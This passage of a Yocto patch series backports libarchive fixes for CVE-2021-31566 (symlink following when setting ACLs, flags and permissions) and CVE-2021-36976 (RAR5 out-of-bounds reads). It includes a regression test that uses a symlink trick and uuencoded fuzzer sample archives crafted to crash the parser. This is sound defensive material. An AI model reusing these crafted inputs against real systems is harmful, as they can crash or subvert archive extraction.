25 }
26
27+ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
28+ errno = EINVAL;
29+ archive_set_error(a, errno,
30+ "Cannot set default ACL on non-directory");
31+ return (ARCHIVE_WARN);
32+ }
33+
34 acl = acl_init(entries);
35 if (acl == (acl_t)NULL) {
36 archive_set_error(a, errno,
37@@ -542,7 +549,10 @@
38 else if (acl_set_link_np(name, acl_type, acl) != 0)
39 #else
40 /* FreeBSD older than 8.0 */
41- else if (acl_set_file(name, acl_type, acl) != 0)
42+ else if (S_ISLNK(mode)) {
43+ /* acl_set_file() follows symbolic links, skip */
44+ ret = ARCHIVE_OK;
45+ } else if (acl_set_file(name, acl_type, acl) != 0)
46 #endif
47 {
48 if (errno == EOPNOTSUPP) {
49@@ -677,14 +687,14 @@
50 & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
51 if ((archive_acl_types(abstract_acl)
52 & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
53- ret = set_acl(a, fd, name, abstract_acl,
54+ ret = set_acl(a, fd, name, abstract_acl, mode,
55 ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
56 if (ret != ARCHIVE_OK)
57 return (ret);
58 }
59 if ((archive_acl_types(abstract_acl)
60 & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
61- ret = set_acl(a, fd, name, abstract_acl,
62+ ret = set_acl(a, fd, name, abstract_acl, mode,
63 ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
64
65 /* Simultaneous POSIX.1e and NFSv4 is not supported */
66@@ -693,7 +703,7 @@
67 #if ARCHIVE_ACL_FREEBSD_NFS4
68 else if ((archive_acl_types(abstract_acl) &
69 ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
70- ret = set_acl(a, fd, name, abstract_acl,
71+ ret = set_acl(a, fd, name, abstract_acl, mode,
72 ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
73 }
74 #endif
75--- a/libarchive/archive_disk_acl_linux.c
76+++ b/libarchive/archive_disk_acl_linux.c
77@@ -343,6 +343,11 @@
78 return (ARCHIVE_FAILED);
79 }
80
81+ if (S_ISLNK(mode)) {
82+ /* Linux does not support RichACLs on symbolic links */
83+ return (ARCHIVE_OK);
84+ }
85+
86 richacl = richacl_alloc(entries);
87 if (richacl == NULL) {
88 archive_set_error(a, errno,
89@@ -455,7 +460,7 @@
90 #if ARCHIVE_ACL_LIBACL
91 static int
92 set_acl(struct archive *a, int fd, const char *name,
93- struct archive_acl *abstract_acl,
94+ struct archive_acl *abstract_acl, __LA_MODE_T mode,
95 int ae_requested_type, const char *tname)
96 {
97 int acl_type = 0;
98@@ -488,6 +493,18 @@
99 return (ARCHIVE_FAILED);
100 }
101
102+ if (S_ISLNK(mode)) {
103+ /* Linux does not support ACLs on symbolic links */
104+ return (ARCHIVE_OK);
105+ }
106+
107+ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
108+ errno = EINVAL;
109+ archive_set_error(a, errno,
110+ "Cannot set default ACL on non-directory");
111+ return (ARCHIVE_WARN);
112+ }
113+
114 acl = acl_init(entries);
115 if (acl == (acl_t)NULL) {
116 archive_set_error(a, errno,
117@@ -727,14 +744,14 @@
118 & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
119 if ((archive_acl_types(abstract_acl)
120 & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
121- ret = set_acl(a, fd, name, abstract_acl,
122+ ret = set_acl(a, fd, name, abstract_acl, mode,
123 ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
124 if (ret != ARCHIVE_OK)
125 return (ret);
126 }
127 if ((archive_acl_types(abstract_acl)
128 & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
129- ret = set_acl(a, fd, name, abstract_acl,
130+ ret = set_acl(a, fd, name, abstract_acl, mode,
131 ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
132 }
133 #endif /* ARCHIVE_ACL_LIBACL */
134--- a/libarchive/archive_disk_acl_sunos.c
135+++ b/libarchive/archive_disk_acl_sunos.c
136@@ -443,7 +443,7 @@
137
138 static int
139 set_acl(struct archive *a, int fd, const char *name,
140- struct archive_acl *abstract_acl,
141+ struct archive_acl *abstract_acl, __LA_MODE_T mode,
142 int ae_requested_type, const char *tname)
143 {
144 aclent_t *aclent;
145@@ -467,7 +467,6 @@
146 if (entries == 0)
147 return (ARCHIVE_OK);
148
149-
150 switch (ae_requested_type) {
151 case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E:
152 cmd = SETACL;
153@@ -492,6 +491,12 @@
154 return (ARCHIVE_FAILED);
155 }
156
157+ if (S_ISLNK(mode)) {
158+ /* Skip ACLs on symbolic links */
159+ ret = ARCHIVE_OK;
160+ goto exit_free;
161+ }
162+
163 e = 0;
164
165 while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type,
166@@ -801,7 +806,7 @@
167 if ((archive_acl_types(abstract_acl)
168 & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
169 /* Solaris writes POSIX.1e access and default ACLs together */
170- ret = set_acl(a, fd, name, abstract_acl,
171+ ret = set_acl(a, fd, name, abstract_acl, mode,
172 ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e");
173
174 /* Simultaneous POSIX.1e and NFSv4 is not supported */
175@@ -810,7 +815,7 @@
176 #if ARCHIVE_ACL_SUNOS_NFS4
177 else if ((archive_acl_types(abstract_acl) &
178 ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
179- ret = set_acl(a, fd, name, abstract_acl,
180+ ret = set_acl(a, fd, name, abstract_acl, mode,
181 ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
182 }
183 #endif
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
new file mode 100644
index 0000000000..c4a2fb612c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
@@ -0,0 +1,23 @@
1Description: Never follow symlinks when setting file flags on Linux
2 Published as CVE-2021-31566
3Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b
4Bug-Debian: https://bugs.debian.org/1001990
5Author: Martin Matuska <martin@matuska.org>
6Last-Update: 2021-12-20
7
8CVE: CVE-2021-31566
9Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
10Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
11
12--- a/libarchive/archive_write_disk_posix.c
13+++ b/libarchive/archive_write_disk_posix.c
14@@ -3927,7 +3927,8 @@
15
16 /* If we weren't given an fd, open it ourselves. */
17 if (myfd < 0) {
18- myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC);
19+ myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY |
20+ O_CLOEXEC | O_NOFOLLOW);
21 __archive_ensure_cloexec_flag(myfd);
22 }
23 if (myfd < 0)
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
new file mode 100644
index 0000000000..0dfcd1ac5c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
@@ -0,0 +1,172 @@
1Description: Do not follow symlinks when processing the fixup list
2 Published as CVE-2021-31566
3Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043
4Bug-Debian: https://bugs.debian.org/1001990
5Author: Martin Matuska <martin@matuska.org>
6Last-Update: 2021-12-20
7
8CVE: CVE-2021-31566
9Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
10Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
11
12--- a/Makefile.am
13+++ b/Makefile.am
14@@ -556,6 +556,7 @@
15 libarchive/test/test_write_disk.c \
16 libarchive/test/test_write_disk_appledouble.c \
17 libarchive/test/test_write_disk_failures.c \
18+ libarchive/test/test_write_disk_fixup.c \
19 libarchive/test/test_write_disk_hardlink.c \
20 libarchive/test/test_write_disk_hfs_compression.c \
21 libarchive/test/test_write_disk_lookup.c \
22--- a/libarchive/archive_write_disk_posix.c
23+++ b/libarchive/archive_write_disk_posix.c
24@@ -2461,6 +2461,7 @@
25 {
26 struct archive_write_disk *a = (struct archive_write_disk *)_a;
27 struct fixup_entry *next, *p;
28+ struct stat st;
29 int fd, ret;
30
31 archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC,
32@@ -2478,6 +2479,20 @@
33 (TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) {
34 fd = open(p->name,
35 O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC);
36+ if (fd == -1) {
37+ /* If we cannot lstat, skip entry */
38+ if (lstat(p->name, &st) != 0)
39+ goto skip_fixup_entry;
40+ /*
41+ * If we deal with a symbolic link, mark
42+ * it in the fixup mode to ensure no
43+ * modifications are made to its target.
44+ */
45+ if (S_ISLNK(st.st_mode)) {
46+ p->mode &= ~S_IFMT;
47+ p->mode |= S_IFLNK;
48+ }
49+ }
50 }
51 if (p->fixup & TODO_TIMES) {
52 set_times(a, fd, p->mode, p->name,
53@@ -2492,7 +2507,12 @@
54 fchmod(fd, p->mode);
55 else
56 #endif
57- chmod(p->name, p->mode);
58+#ifdef HAVE_LCHMOD
59+ lchmod(p->name, p->mode);
60+#else
61+ if (!S_ISLNK(p->mode))
62+ chmod(p->name, p->mode);
63+#endif
64 }
65 if (p->fixup & TODO_ACLS)
66 archive_write_disk_set_acls(&a->archive, fd,
67@@ -2503,6 +2523,7 @@
68 if (p->fixup & TODO_MAC_METADATA)
69 set_mac_metadata(a, p->name, p->mac_metadata,
70 p->mac_metadata_size);
71+skip_fixup_entry:
72 next = p->next;
73 archive_acl_clear(&p->acl);
74 free(p->mac_metadata);
75@@ -2643,6 +2664,7 @@
76 fe->next = a->fixup_list;
77 a->fixup_list = fe;
78 fe->fixup = 0;
79+ fe->mode = 0;
80 fe->name = strdup(pathname);
81 return (fe);
82 }
83--- a/libarchive/test/CMakeLists.txt
84+++ b/libarchive/test/CMakeLists.txt
85@@ -208,6 +208,7 @@
86 test_write_disk.c
87 test_write_disk_appledouble.c
88 test_write_disk_failures.c
89+ test_write_disk_fixup.c
90 test_write_disk_hardlink.c
91 test_write_disk_hfs_compression.c
92 test_write_disk_lookup.c
93--- /dev/null
94+++ b/libarchive/test/test_write_disk_fixup.c
95@@ -0,0 +1,77 @@
96+/*-
97+ * Copyright (c) 2021 Martin Matuska
98+ * All rights reserved.
99+ *
100+ * Redistribution and use in source and binary forms, with or without
101+ * modification, are permitted provided that the following conditions
102+ * are met:
103+ * 1. Redistributions of source code must retain the above copyright
104+ * notice, this list of conditions and the following disclaimer.
105+ * 2. Redistributions in binary form must reproduce the above copyright
106+ * notice, this list of conditions and the following disclaimer in the
107+ * documentation and/or other materials provided with the distribution.
108+ *
109+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
110+ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
111+ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
112+ * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
113+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
114+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
115+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
116+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
117+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
118+ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
119+ */
120+#include "test.h"
121+
122+/*
123+ * Test fixup entries don't follow symlinks
124+ */
125+DEFINE_TEST(test_write_disk_fixup)
126+{
127+ struct archive *ad;
128+ struct archive_entry *ae;
129+ int r;
130+
131+ if (!canSymlink()) {
132+ skipping("Symlinks not supported");
133+ return;
134+ }
135+
136+ /* Write entries to disk. */
137+ assert((ad = archive_write_disk_new()) != NULL);
138+
139+ /*
140+ * Create a file
141+ */
142+ assertMakeFile("victim", 0600, "a");
143+
144+ /*
145+ * Create a directory and a symlink with the same name
146+ */
147+
148+ /* Directory: dir */
149+ assert((ae = archive_entry_new()) != NULL);
150+ archive_entry_copy_pathname(ae, "dir");
151+ archive_entry_set_mode(ae, AE_IFDIR | 0606);
152+ assertEqualIntA(ad, 0, archive_write_header(ad, ae));
153+ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
154+ archive_entry_free(ae);
155+
156+ /* Symbolic Link: dir -> foo */
157+ assert((ae = archive_entry_new()) != NULL);
158+ archive_entry_copy_pathname(ae, "dir");
159+ archive_entry_set_mode(ae, AE_IFLNK | 0777);
160+ archive_entry_set_size(ae, 0);
161+ archive_entry_copy_symlink(ae, "victim");
162+ assertEqualIntA(ad, 0, r = archive_write_header(ad, ae));
163+ if (r >= ARCHIVE_WARN)
164+ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
165+ archive_entry_free(ae);
166+
167+ assertEqualInt(ARCHIVE_OK, archive_write_free(ad));
168+
169+ /* Test the entries on disk. */
170+ assertIsSymlink("dir", "victim", 0);
171+ assertFileMode("victim", 0600);
172+}
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
new file mode 100644
index 0000000000..fca53fc9b6
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
@@ -0,0 +1,321 @@
1From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001
2From: Grzegorz Antoniak <ga@anadoxin.org>
3Date: Sat, 13 Feb 2021 09:08:13 +0100
4Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files
5
6Added more range checks in the bit stream reading functions
7(read_bits_16 and read_bits_32) in order to better guard against out of
8memory reads.
9
10This commit contains a test with OSSFuzz sample #30448.
11
12Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1]
13CVE: CVE-2021-36976
14Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
15---
16 Makefile.am | 1 +
17 libarchive/archive_read_support_format_rar5.c | 108 ++++++++++--------
18 libarchive/test/test_read_format_rar5.c | 16 +++
19 ...r5_decode_number_out_of_bounds_read.rar.uu | 10 ++
20 4 files changed, 89 insertions(+), 46 deletions(-)
21 create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
22
23--- a/Makefile.am
24+++ b/Makefile.am
25@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\
26 libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \
27 libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
28 libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
29+ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
30 libarchive/test/test_read_format_raw.bufr.uu \
31 libarchive/test/test_read_format_raw.data.gz.uu \
32 libarchive/test/test_read_format_raw.data.Z.uu \
33--- a/libarchive/archive_read_support_format_rar5.c
34+++ b/libarchive/archive_read_support_format_rar5.c
35@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive
36 return ret;
37 }
38
39-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) {
40+static int read_bits_32(struct archive_read* a, struct rar5* rar,
41+ const uint8_t* p, uint32_t* value)
42+{
43+ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
44+ archive_set_error(&a->archive,
45+ ARCHIVE_ERRNO_PROGRAMMER,
46+ "Premature end of stream during extraction of data (#1)");
47+ return ARCHIVE_FATAL;
48+ }
49+
50 uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24;
51 bits |= p[rar->bits.in_addr + 1] << 16;
52 bits |= p[rar->bits.in_addr + 2] << 8;
53@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar
54 return ARCHIVE_OK;
55 }
56
57-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) {
58+static int read_bits_16(struct archive_read* a, struct rar5* rar,
59+ const uint8_t* p, uint16_t* value)
60+{
61+ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
62+ archive_set_error(&a->archive,
63+ ARCHIVE_ERRNO_PROGRAMMER,
64+ "Premature end of stream during extraction of data (#2)");
65+ return ARCHIVE_FATAL;
66+ }
67+
68 int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16;
69 bits |= (int) p[rar->bits.in_addr + 1] << 8;
70 bits |= (int) p[rar->bits.in_addr + 2];
71@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar,
72 }
73
74 /* n = up to 16 */
75-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n,
76- int* value)
77+static int read_consume_bits(struct archive_read* a, struct rar5* rar,
78+ const uint8_t* p, int n, int* value)
79 {
80 uint16_t v;
81 int ret, num;
82@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5
83 return ARCHIVE_FATAL;
84 }
85
86- ret = read_bits_16(rar, p, &v);
87+ ret = read_bits_16(a, rar, p, &v);
88 if(ret != ARCHIVE_OK)
89 return ret;
90
91@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t*
92 static int decode_number(struct archive_read* a, struct decode_table* table,
93 const uint8_t* p, uint16_t* num)
94 {
95- int i, bits, dist;
96+ int i, bits, dist, ret;
97 uint16_t bitfield;
98 uint32_t pos;
99 struct rar5* rar = get_context(a);
100
101- if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) {
102- return ARCHIVE_EOF;
103+ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) {
104+ return ret;
105 }
106
107 bitfield &= 0xfffe;
108@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r
109 for(i = 0; i < HUFF_TABLE_SIZE;) {
110 uint16_t num;
111
112- if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) {
113- /* Truncated data, can't continue. */
114- archive_set_error(&a->archive,
115- ARCHIVE_ERRNO_FILE_FORMAT,
116- "Truncated data in huffman tables (#2)");
117- return ARCHIVE_FATAL;
118- }
119-
120 ret = decode_number(a, &rar->cstate.bd, p, &num);
121 if(ret != ARCHIVE_OK) {
122 archive_set_error(&a->archive,
123@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r
124 /* 16..17: repeat previous code */
125 uint16_t n;
126
127- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
128- return ARCHIVE_EOF;
129+ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
130+ return ret;
131
132 if(num == 16) {
133 n >>= 13;
134@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r
135 /* other codes: fill with zeroes `n` times */
136 uint16_t n;
137
138- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
139- return ARCHIVE_EOF;
140+ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
141+ return ret;
142
143 if(num == 18) {
144 n >>= 13;
145@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc
146 }
147
148 /* Convenience function used during filter processing. */
149-static int parse_filter_data(struct rar5* rar, const uint8_t* p,
150- uint32_t* filter_data)
151+static int parse_filter_data(struct archive_read* a, struct rar5* rar,
152+ const uint8_t* p, uint32_t* filter_data)
153 {
154- int i, bytes;
155+ int i, bytes, ret;
156 uint32_t data = 0;
157
158- if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes))
159- return ARCHIVE_EOF;
160+ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes)))
161+ return ret;
162
163 bytes++;
164
165 for(i = 0; i < bytes; i++) {
166 uint16_t byte;
167
168- if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) {
169- return ARCHIVE_EOF;
170+ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) {
171+ return ret;
172 }
173
174 /* Cast to uint32_t will ensure the shift operation will not
175@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r
176 uint16_t filter_type;
177 struct filter_info* filt = NULL;
178 struct rar5* rar = get_context(ar);
179+ int ret;
180
181 /* Read the parameters from the input stream. */
182- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start))
183- return ARCHIVE_EOF;
184+ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start)))
185+ return ret;
186
187- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length))
188- return ARCHIVE_EOF;
189+ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length)))
190+ return ret;
191
192- if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type))
193- return ARCHIVE_EOF;
194+ if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type)))
195+ return ret;
196
197 filter_type >>= 13;
198 skip_bits(rar, 3);
199@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r
200 if(filter_type == FILTER_DELTA) {
201 int channels;
202
203- if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels))
204- return ARCHIVE_EOF;
205+ if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels)))
206+ return ret;
207
208 filt->channels = channels + 1;
209 }
210@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r
211 return ARCHIVE_OK;
212 }
213
214-static int decode_code_length(struct rar5* rar, const uint8_t* p,
215- uint16_t code)
216+static int decode_code_length(struct archive_read* a, struct rar5* rar,
217+ const uint8_t* p, uint16_t code)
218 {
219 int lbits, length = 2;
220+
221 if(code < 8) {
222 lbits = 0;
223 length += code;
224@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar
225 if(lbits > 0) {
226 int add;
227
228- if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add))
229+ if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add))
230 return -1;
231
232 length += add;
233@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar
234 continue;
235 } else if(num >= 262) {
236 uint16_t dist_slot;
237- int len = decode_code_length(rar, p, num - 262),
238+ int len = decode_code_length(a, rar, p, num - 262),
239 dbits,
240 dist = 1;
241
242@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar
243 uint16_t low_dist;
244
245 if(dbits > 4) {
246- if(ARCHIVE_OK != read_bits_32(
247- rar, p, &add)) {
248+ if(ARCHIVE_OK != (ret = read_bits_32(
249+ a, rar, p, &add))) {
250 /* Return EOF if we
251 * can't read more
252 * data. */
253- return ARCHIVE_EOF;
254+ return ret;
255 }
256
257 skip_bits(rar, dbits - 4);
258@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar
259 /* dbits is one of [0,1,2,3] */
260 int add;
261
262- if(ARCHIVE_OK != read_consume_bits(rar,
263- p, dbits, &add)) {
264+ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar,
265+ p, dbits, &add))) {
266 /* Return EOF if we can't read
267 * more data. */
268- return ARCHIVE_EOF;
269+ return ret;
270 }
271
272 dist += add;
273@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar
274 return ARCHIVE_FATAL;
275 }
276
277- len = decode_code_length(rar, p, len_slot);
278+ len = decode_code_length(a, rar, p, len_slot);
279+ if (len == -1) {
280+ return ARCHIVE_FATAL;
281+ }
282+
283 rar->cstate.last_len = len;
284
285 if(ARCHIVE_OK != copy_string(a, len, dist))
286--- a/libarchive/test/test_read_format_rar5.c
287+++ b/libarchive/test/test_read_format_rar5.c
288@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_
289
290 EPILOGUE();
291 }
292+
293+DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read)
294+{
295+ /* oss fuzz 30448 */
296+
297+ char buf[4096];
298+ PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar");
299+
300+ /* Return codes of those calls are ignored, because this sample file
301+ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
302+ * errors during processing. */
303+
304+ (void) archive_read_next_header(a, &ae);
305+ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
306+
307+ EPILOGUE();
308+}
309--- /dev/null
310+++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
311@@ -0,0 +1,10 @@
312+begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar
313+M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V
314+M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P``
315+M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@
316+M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@
317+M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@
318+M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@
319+E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(```
320+`
321+end
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
new file mode 100644
index 0000000000..b5da44ec7b
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
@@ -0,0 +1,121 @@
1From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001
2From: Grzegorz Antoniak <ga@anadoxin.org>
3Date: Fri, 12 Feb 2021 20:18:31 +0100
4Subject: [PATCH] RAR5 reader: fix invalid memory access in some files
5
6RAR5 reader uses several variables to manage the window buffer during
7extraction: the buffer itself (`window_buf`), the current size of the
8window buffer (`window_size`), and a helper variable (`window_mask`)
9that is used to constrain read and write offsets to the window buffer.
10
11Some specially crafted files can force the unpacker to update the
12`window_mask` variable to a value that is out of sync with current
13buffer size. If the `window_mask` will be bigger than the actual buffer
14size, then an invalid access operation can happen (SIGSEGV).
15
16This commit ensures that if the `window_size` and `window_mask` will be
17changed, the window buffer will be reallocated to the proper size, so no
18invalid memory operation should be possible.
19
20This commit contains a test file from OSSFuzz #30442.
21
22Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1]
23CVE: CVE-2021-36976
24Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
25
26---
27 Makefile.am | 1 +
28 libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++-----
29 libarchive/test/test_read_format_rar5.c | 17 ++++++++++++
30 ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++
31 4 files changed, 50 insertions(+), 6 deletions(-)
32 create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
33
34--- a/Makefile.am
35+++ b/Makefile.am
36@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\
37 libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
38 libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
39 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
40+ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
41 libarchive/test/test_read_format_raw.bufr.uu \
42 libarchive/test/test_read_format_raw.data.gz.uu \
43 libarchive/test/test_read_format_raw.data.Z.uu \
44--- a/libarchive/archive_read_support_format_rar5.c
45+++ b/libarchive/archive_read_support_format_rar5.c
46@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch
47 }
48 }
49
50- /* If we're currently switching volumes, ignore the new definition of
51- * window_size. */
52- if(rar->cstate.switch_multivolume == 0) {
53- /* Values up to 64M should fit into ssize_t on every
54- * architecture. */
55- rar->cstate.window_size = (ssize_t) window_size;
56+ if(rar->cstate.window_size < (ssize_t) window_size &&
57+ rar->cstate.window_buf)
58+ {
59+ /* If window_buf has been allocated before, reallocate it, so
60+ * that its size will match new window_size. */
61+
62+ uint8_t* new_window_buf =
63+ realloc(rar->cstate.window_buf, window_size);
64+
65+ if(!new_window_buf) {
66+ archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER,
67+ "Not enough memory when trying to realloc the window "
68+ "buffer.");
69+ return ARCHIVE_FATAL;
70+ }
71+
72+ rar->cstate.window_buf = new_window_buf;
73 }
74
75+ /* Values up to 64M should fit into ssize_t on every
76+ * architecture. */
77+ rar->cstate.window_size = (ssize_t) window_size;
78+
79 if(rar->file.solid > 0 && rar->file.solid_window_size == 0) {
80 /* Solid files have to have the same window_size across
81 whole archive. Remember the window_size parameter
82--- a/libarchive/test/test_read_format_rar5.c
83+++ b/libarchive/test/test_read_format_rar5.c
